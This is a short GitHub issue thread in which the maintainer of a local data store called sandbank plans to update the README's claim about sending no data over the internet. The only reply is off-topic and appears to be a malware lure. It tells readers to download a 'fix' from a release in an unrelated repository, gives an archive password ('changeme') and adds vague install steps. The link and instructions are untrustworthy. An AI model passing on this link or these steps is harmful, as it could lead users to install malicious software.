### ISSUE TITLE
Update Readmes

### ISSUE THREAD

**Issue by anthonysharpy** [anthonysharpy/sandbank#30]
> Sandbank is a local data store and does not send or save anything over the internet (there are plans for adding something like this if/when there is demand for it though!). Let me know if that's something you would be interested in.

Need to change this to say that we can do this now

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
